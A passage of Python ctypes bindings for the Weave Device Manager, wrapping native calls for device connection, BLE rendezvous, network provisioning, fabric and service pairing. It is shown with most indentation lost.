lambda: WeaveUtility.CStringToString(self._dmLib.nl_Weave_DeviceManager_DeviceAddress(self.devMgr))
)
def SetRendezvousAddress(self, addr, intf = None):
if addr is not None and "\x00" in addr:
raise ValueError("Unexpected NUL character in addr");
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_SetRendezvousAddress(self.devMgr, WeaveUtility.StringToCString(addr), WeaveUtility.StringToCString(intf))
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def SetConnectTimeout(self, timeoutMS):
        if timeoutMS < 0 or timeoutMS > 0xFFFFFFFF:  # max unsigned 32-bit value
raise ValueError("timeoutMS must be an unsigned 32-bit integer")
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_SetConnectTimeout(self.devMgr, timeoutMS)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def SetAutoReconnect(self, autoReconnect):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_SetAutoReconnect(self.devMgr, autoReconnect)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def SetRendezvousLinkLocal(self, RendezvousLinkLocal):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal(self.devMgr, RendezvousLinkLocal)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def StartDeviceEnumeration(self, targetFabricId=TargetFabricId_AnyFabric,
targetModes=TargetDeviceMode_Any,
targetVendorId=TargetVendorId_Any,
targetProductId=TargetProductId_Any,
targetDeviceId=TargetDeviceId_Any):
deviceCriteria = _IdentifyDeviceCriteriaStruct()
deviceCriteria.TargetFabricId = targetFabricId
deviceCriteria.TargetModes = targetModes
deviceCriteria.TargetVendorId = targetVendorId
deviceCriteria.TargetProductId = targetProductId
deviceCriteria.TargetDeviceId = targetDeviceId
self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration(self.devMgr, deviceCriteria, self.cbHandleDeviceEnumerationResponse, self._weaveStack.cbHandleError)
)
def StopDeviceEnumeration(self):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration(self.devMgr)
)
def ConnectDevice(self, deviceId, deviceAddr=None,
pairingCode=None, accessToken=None):
if deviceAddr is not None and '\x00' in deviceAddr:
raise ValueError("Unexpected NUL character in deviceAddr")
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.ConnectDevice')
if (pairingCode == None and accessToken == None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth(self.devMgr, deviceId, WeaveUtility.StringToCString(deviceAddr), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
elif (pairingCode != None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode(self.devMgr, deviceId, WeaveUtility.StringToCString(deviceAddr), WeaveUtility.StringToCString(pairingCode), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
else:
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken(self.devMgr, deviceId, WeaveUtility.StringToCString(deviceAddr), WeaveUtility.ByteArrayToVoidPtr(accessToken), len(accessToken), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def RendezvousDevice(self, pairingCode=None, accessToken=None,
targetFabricId=TargetFabricId_AnyFabric,
targetModes=TargetDeviceMode_Any,
targetVendorId=TargetVendorId_Any,
targetProductId=TargetProductId_Any,
targetDeviceId=TargetDeviceId_Any):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.RendezvousDevice')
deviceCriteria = _IdentifyDeviceCriteriaStruct()
deviceCriteria.TargetFabricId = targetFabricId
deviceCriteria.TargetModes = targetModes
deviceCriteria.TargetVendorId = targetVendorId
deviceCriteria.TargetProductId = targetProductId
deviceCriteria.TargetDeviceId = targetDeviceId
if (pairingCode == None and accessToken == None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth(self.devMgr, deviceCriteria, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
elif (pairingCode != None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode(self.devMgr, WeaveUtility.StringToCString(pairingCode), deviceCriteria, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
else:
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken(self.devMgr, WeaveUtility.ByteArrayToVoidPtr(accessToken), len(accessToken), deviceCriteria, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
# methods for testing BLE performance are not a part of the Weave Device Manager API, but rather are considered internal.
def TestBle(self, connObj, count, duration, delay, ack, size, rx):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_TestBle(self.devMgr, connObj, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError, count, duration, delay, ack, size, rx)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def TestResultBle(self, connObj, local):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_TestResultBle(self.devMgr, connObj, local)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def TestAbortBle(self, connObj):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_TestAbortBle(self.devMgr, connObj)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def TxTimingBle(self, connObj, enabled, remote):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_TxTimingBle(self.devMgr, connObj, enabled, remote)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
# end of BLE testing methods
def ConnectBle(self, bleConnection, pairingCode=None, accessToken=None):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.ConnectBle')
if (pairingCode == None and accessToken == None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth(self.devMgr, bleConnection, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
elif (pairingCode != None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode(self.devMgr, bleConnection, WeaveUtility.StringToCString(pairingCode), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
else:
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken(self.devMgr, bleConnection, WeaveUtility.ByteArrayToVoidPtr(accessToken), len(accessToken), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def PassiveRendezvousDevice(self, pairingCode=None, accessToken=None):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.PassiveRendezvousDevice')
if (pairingCode == None and accessToken == None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
elif (pairingCode != None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode(self.devMgr, WeaveUtility.StringToCString(pairingCode), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
else:
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken(self.devMgr, WeaveUtility.ByteArrayToVoidPtr(accessToken), len(accessToken), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def RemotePassiveRendezvous(self, rendezvousDeviceAddr=None, pairingCode=None, accessToken=None, rendezvousTimeout=None, inactivityTimeout=None):
if rendezvousDeviceAddr == None:
rendezvousDeviceAddr = "::"
if '\x00' in rendezvousDeviceAddr:
raise ValueError("Unexpected NUL character in rendezvousDeviceAddr")
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode == None and accessToken == None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth(self.devMgr, WeaveUtility.StringToCString(rendezvousDeviceAddr), rendezvousTimeout, inactivityTimeout, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
elif (pairingCode != None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth(self.devMgr, WeaveUtility.StringToCString(rendezvousDeviceAddr), WeaveUtility.StringToCString(pairingCode), rendezvousTimeout, inactivityTimeout, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
else:
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth(self.devMgr, WeaveUtility.StringToCString(rendezvousDeviceAddr), WeaveUtility.ByteArrayToVoidPtr(accessToken), len(accessToken), rendezvousTimeout, inactivityTimeout, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def ReconnectDevice(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ReconnectDevice(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def Close(self):
self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_Close(self.devMgr)
)
def EnableConnectionMonitor(self, interval, timeout):
        if interval < 0 or interval > 0xFFFF:
            raise ValueError("interval must be an unsigned 16-bit value")
        if timeout < 0 or timeout > 0xFFFF:
            raise ValueError("timeout must be an unsigned 16-bit value")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor(self.devMgr, interval, timeout, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def DisableConnectionMonitor(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def IdentifyDevice(self):
def HandleIdentifyDeviceComplete(devMgr, reqState, deviceDescPtr):
self._weaveStack.callbackRes = deviceDescPtr.contents.toDeviceDescriptor()
self._weaveStack.completeEvent.set()
cbHandleIdentifyDeviceComplete = _IdentifyDeviceCompleteFunct(HandleIdentifyDeviceComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_IdentifyDevice(self.devMgr, cbHandleIdentifyDeviceComplete, self._weaveStack.cbHandleError)
)
def PairToken(self, pairingToken):
def HandlePairTokenComplete(devMgr, reqState, tokenPairingBundlePtr, tokenPairingBundleLen):
self._weaveStack.callbackRes = WeaveUtility.VoidPtrToByteArray(tokenPairingBundlePtr, tokenPairingBundleLen)
self._weaveStack.completeEvent.set()
cbHandlePairTokenComplete = _PairTokenCompleteFunct(HandlePairTokenComplete)
if pairingToken is not None and isinstance(pairingToken, str):
pairingToken = WeaveUtility.StringToCString(pairingToken)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_PairToken(self.devMgr, WeaveUtility.ByteArrayToVoidPtr(pairingToken), len(pairingToken), cbHandlePairTokenComplete, self._weaveStack.cbHandleError)
)
def UnpairToken(self):
def HandleUnpairTokenComplete(devMgr, reqState):
self._weaveStack.callbackRes = True
self._weaveStack.completeEvent.set()
cbHandleUnpairTokenComplete = _UnpairTokenCompleteFunct(HandleUnpairTokenComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_UnpairToken(self.devMgr, cbHandleUnpairTokenComplete, self._weaveStack.cbHandleError)
)
def ScanNetworks(self, networkType):
def HandleScanNetworksComplete(devMgr, reqState, netCount, netInfoPtr):
self._weaveStack.callbackRes = [ netInfoPtr[i].toNetworkInfo() for i in range(netCount) ]
self._weaveStack.completeEvent.set()
cbHandleScanNetworksComplete = _NetworkScanCompleteFunct(HandleScanNetworksComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ScanNetworks(self.devMgr, networkType, cbHandleScanNetworksComplete, self._weaveStack.cbHandleError)
)
def GetNetworks(self, getFlags):
def HandleGetNetworksComplete(devMgr, reqState, netCount, netInfoPtr):
self._weaveStack.callbackRes = [ netInfoPtr[i].toNetworkInfo() for i in range(netCount) ]
self._weaveStack.completeEvent.set()
cbHandleGetNetworksComplete = _GetNetworksCompleteFunct(HandleGetNetworksComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetNetworks(self.devMgr, getFlags, cbHandleGetNetworksComplete, self._weaveStack.cbHandleError)
)
def GetCameraAuthData(self, nonce):
if nonce is not None and '\x00' in nonce:
raise ValueError("Unexpected NUL character in nonce")
def HandleGetCameraAuthDataComplete(devMgr, reqState, macAddress, signedCameraPayload):
            self._weaveStack.callbackRes = [ WeaveUtility.CStringToString(macAddress), WeaveUtility.CStringToString(signedCameraPayload) ]
            self._weaveStack.completeEvent.set()
cbHandleGetCameraAuthDataComplete = _GetCameraAuthDataCompleteFunct(HandleGetCameraAuthDataComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetCameraAuthData(self.devMgr, WeaveUtility.StringToCString(nonce), cbHandleGetCameraAuthDataComplete, self._weaveStack.cbHandleError)
)
def AddNetwork(self, networkInfo):
def HandleAddNetworkComplete(devMgr, reqState, networkId):
self._weaveStack.callbackRes = networkId
self._weaveStack.completeEvent.set()
cbHandleAddNetworkComplete = _AddNetworkCompleteFunct(HandleAddNetworkComplete)
networkInfoStruct = _NetworkInfoStruct.fromNetworkInfo(networkInfo)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_AddNetwork(self.devMgr, networkInfoStruct, cbHandleAddNetworkComplete, self._weaveStack.cbHandleError)
)
def UpdateNetwork(self, networkInfo):
networkInfoStruct = _NetworkInfoStruct.fromNetworkInfo(networkInfo)
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_UpdateNetwork(self.devMgr, networkInfoStruct, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def RemoveNetwork(self, networkId):
        if networkId < 0 or networkId >= pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RemoveNetwork(self.devMgr, networkId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def EnableNetwork(self, networkId):
        if networkId < 0 or networkId >= pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_EnableNetwork(self.devMgr, networkId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def DisableNetwork(self, networkId):
        if networkId < 0 or networkId >= pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_DisableNetwork(self.devMgr, networkId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def TestNetworkConnectivity(self, networkId):
        if networkId < 0 or networkId >= pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity(self.devMgr, networkId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def GetRendezvousMode(self):
def HandleGetRendezvousModeComplete(devMgr, reqState, modeFlags):
self._weaveStack.callbackRes = modeFlags
self._weaveStack.completeEvent.set()
cbHandleGetRendezvousModeComplete = _GetRendezvousModeCompleteFunct(HandleGetRendezvousModeComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetRendezvousMode(self.devMgr, cbHandleGetRendezvousModeComplete, self._weaveStack.cbHandleError)
)
def SetRendezvousMode(self, modeFlags):
        if modeFlags < 0 or modeFlags >= pow(2,16):
raise ValueError("modeFlags must be an unsigned 16-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_SetRendezvousMode(self.devMgr, modeFlags, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def GetWirelessRegulatoryConfig(self):
def HandleComplete(devMgr, reqState, regConfigPtr):
self._weaveStack.callbackRes = regConfigPtr[0].toWirelessRegConfig()
self._weaveStack.completeEvent.set()
cbHandleComplete = _GetWirelessRegulatoryConfigCompleteFunct(HandleComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetWirelessRegulatoryConfig(self.devMgr, cbHandleComplete, self._weaveStack.cbHandleError)
)
def SetWirelessRegulatoryConfig(self, regConfig):
regConfigStruct = _WirelessRegConfigStruct.fromWirelessRegConfig(regConfig)
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_SetWirelessRegulatoryConfig(self.devMgr, regConfigStruct, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def GetLastNetworkProvisioningResult(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def CreateFabric(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_CreateFabric(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def LeaveFabric(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_LeaveFabric(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def GetFabricConfig(self):
def HandleGetFabricConfigComplete(devMgr, reqState, fabricConfigPtr, fabricConfigLen):
self._weaveStack.callbackRes = WeaveUtility.VoidPtrToByteArray(fabricConfigPtr, fabricConfigLen)
self._weaveStack.completeEvent.set()
cbHandleGetFabricConfigComplete = _GetFabricConfigCompleteFunct(HandleGetFabricConfigComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetFabricConfig(self.devMgr, cbHandleGetFabricConfigComplete, self._weaveStack.cbHandleError)
)
def JoinExistingFabric(self, fabricConfig):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_JoinExistingFabric(self.devMgr, WeaveUtility.ByteArrayToVoidPtr(fabricConfig), len(fabricConfig),
self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def Ping(self):
WeaveUtility.StringToCString("test")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_Ping(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def RegisterServicePairAccount(self, serviceId, accountId, serviceConfig, pairingToken, pairingInitData):
if accountId is not None and '\x00' in accountId:
raise ValueError("Unexpected NUL character in accountId")
if pairingToken is not None and isinstance(pairingToken, str):
pairingToken = WeaveUtility.StringToCString(pairingToken)
if pairingInitData is not None and isinstance(pairingInitData, str):
pairingInitData = WeaveUtility.StringToCString(pairingInitData)
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount(self.devMgr, serviceId, WeaveUtility.StringToCString(accountId),
WeaveUtility.ByteArrayToVoidPtr(serviceConfig), len(serviceConfig),
WeaveUtility.ByteArrayToVoidPtr(pairingToken), len(pairingToken),
WeaveUtility.ByteArrayToVoidPtr(pairingInitData), len(pairingInitData),
self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def UpdateService(self, serviceId, serviceConfig):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_UpdateService(self.devMgr, serviceId, WeaveUtility.ByteArrayToVoidPtr(serviceConfig),
len(serviceConfig), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def UnregisterService(self, serviceId):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_UnregisterService(self.devMgr, serviceId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def ArmFailSafe(self, armMode, failSafeToken):
        if armMode < 0 or armMode >= pow(2, 8):
            raise ValueError("armMode must be an unsigned 8-bit integer")
        if failSafeToken < 0 or failSafeToken >= pow(2, 32):
            raise ValueError("failSafeToken must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ArmFailSafe(self.devMgr, armMode, failSafeToken, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def DisarmFailSafe(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_DisarmFailSafe(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def ResetConfig(self, resetFlags):
        if resetFlags < 0 or resetFlags >= pow(2, 16):
raise ValueError("resetFlags must be an unsigned 16-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ResetConfig(self.devMgr, resetFlags, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def CloseEndpoints(self):
self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_CloseEndpoints()
)
def SetLogFilter(self, category):
        if category < 0 or category >= pow(2, 8):
raise ValueError("category must be an unsigned 8-bit integer")
self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_SetLogFilter(category)
)
def GetLogFilter(self):
self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_GetLogFilter()
)
def SetBlockingCB(self, blockingCB):
self._weaveStack.blockingCB = blockingCB
def StartSystemTest(self, profileId, testId):
        if profileId < 0 or profileId >= pow(2, 32):
            raise ValueError("profileId must be an unsigned 32-bit integer")
        if testId < 0 or testId >= pow(2, 32):
            raise ValueError("testId must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_StartSystemTest(self.devMgr, profileId, testId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def StopSystemTest(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_StopSystemTest(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
# ----- Private Members -----
def _InitLib(self):
        if (self._dmLib is None):
self._dmLib = CDLL(self._weaveStack.LocateWeaveDLL())
self._dmLib.nl_Weave_DeviceManager_NewDeviceManager.argtypes = [ POINTER(c_void_p) ]
self._dmLib.nl_Weave_DeviceManager_NewDeviceManager.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_DeleteDeviceManager.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_DeleteDeviceManager.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_Close.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_Close.restype = None
self._dmLib.nl_Weave_DeviceManager_DriveIO.argtypes = [ c_uint32 ]
self._dmLib.nl_Weave_DeviceManager_DriveIO.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_WakeForBleIO.argtypes = [ ]
self._dmLib.nl_Weave_DeviceManager_WakeForBleIO.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetBleEventCB.argtypes = [ _GetBleEventFunct ]
self._dmLib.nl_Weave_DeviceManager_SetBleEventCB.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic.argtypes = [ _WriteBleCharacteristicFunct ]
self._dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic.argtypes = [ _SubscribeBleCharacteristicFunct ]
self._dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetBleClose.argtypes = [ _CloseBleFunct ]
self._dmLib.nl_Weave_DeviceManager_SetBleClose.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_IsConnected.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_IsConnected.restype = c_bool
self._dmLib.nl_Weave_DeviceManager_DeviceId.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_DeviceId.restype = c_uint64
self._dmLib.nl_Weave_DeviceManager_DeviceAddress.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_DeviceAddress.restype = c_char_p
self._dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration.argtypes = [ c_void_p, POINTER(_IdentifyDeviceCriteriaStruct), _DeviceEnumerationResponseFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration.restype = None
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth.argtypes = [ c_void_p, c_uint64, c_char_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode.argtypes = [ c_void_p, c_uint64, c_char_p, c_char_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken.argtypes = [ c_void_p, c_uint64, c_char_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth.argtypes = [ c_void_p, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode.argtypes = [ c_void_p, c_char_p, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken.argtypes = [ c_void_p, c_void_p, c_uint32, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode.argtypes = [ c_void_p, c_char_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken.argtypes = [ c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_TestBle.argtypes = [ c_void_p, c_void_p, _CompleteFunct, _ErrorFunct, c_uint32, c_uint32, c_uint16, c_uint8, c_uint16, c_bool ]
self._dmLib.nl_Weave_DeviceManager_TestBle.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_TestResultBle.argtypes = [ c_void_p, c_void_p, c_bool ]
self._dmLib.nl_Weave_DeviceManager_TestResultBle.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_TestAbortBle.argtypes = [ c_void_p, c_void_p ]
self._dmLib.nl_Weave_DeviceManager_TestAbortBle.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_TxTimingBle.argtypes = [ c_void_p, c_void_p, c_bool, c_bool ]
self._dmLib.nl_Weave_DeviceManager_TxTimingBle.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth.argtypes = [ c_void_p, c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode.argtypes = [ c_void_p, c_void_p, c_char_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken.argtypes = [ c_void_p, c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth.argtypes = [ c_void_p, c_char_p, c_char_p, c_uint32, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
